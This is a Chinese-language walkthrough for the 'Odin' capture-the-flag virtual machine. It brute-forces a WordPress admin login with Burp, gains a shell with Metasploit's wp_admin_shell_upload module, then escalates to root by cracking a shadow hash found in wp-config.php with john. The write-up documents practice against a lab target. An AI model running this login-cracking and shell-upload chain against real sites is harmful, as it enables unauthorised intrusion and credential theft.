描述
难度:容易
奥丁以乔格海姆(Vegtam)的行者的名义冒险前往约特海姆(Jötunheim)附近的米米尔(Mimir)井。守卫井的米米尔(Mimir)允许他从井里喝水,他要求他牺牲左眼,这是他获取知识的意愿的象征
请添加/ etc / hosts-> ip vm + odin
例如:192.168.1.1 odin
推特:@ArmBjorn
在Virtualbox中工作。
获取root权限
由于靶机中许多许多url使用了odin,没有动态获取,因此需要加一条本地dns
编辑C:\Windows\System32\drivers\etc\hosts
底部添加 IP地址 odin
目录
一、信息收集
1.nmap端口扫描:
2.dirsearch目录扫描:
python3 dirsearch.py -u 192.168.155.132 -e php
找到后台目录,访问http://odin/wp-login.php
二、漏洞探测&利用
1. burp爆破
用户名admin密码不正确,burp爆破。
密码为:qwerty
登入后台管理。
2. getshell
1.过上传插件的方式将我们的一句话木马插入到根目录中
但是找不到文件的绝对路径。
2 . metasploit反弹shell
search wordpress shell
搜索与wordpress 的payload
use exploit/unix/webapp/wp_admin_shell_upload
options
set password qwerty
set username admin
set rhost 192.168.155.132 #目标ip
run
shell
python3 -c "import pty;pty.spawn('/bin/bash')"
四、提权
1.查询www下的配置文件wp-config.php
2.john解密
/** root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::*/
将密文保存到pass.txt
john pass.txt && john --show pass.txt
解得:root/jasmine
3.su
su root
五、总结
- 知道cms的管理员的账号密码,但很难利用上传点时,msf> use exploit/unix/webapp/wp_admin_shell_upload
- john解密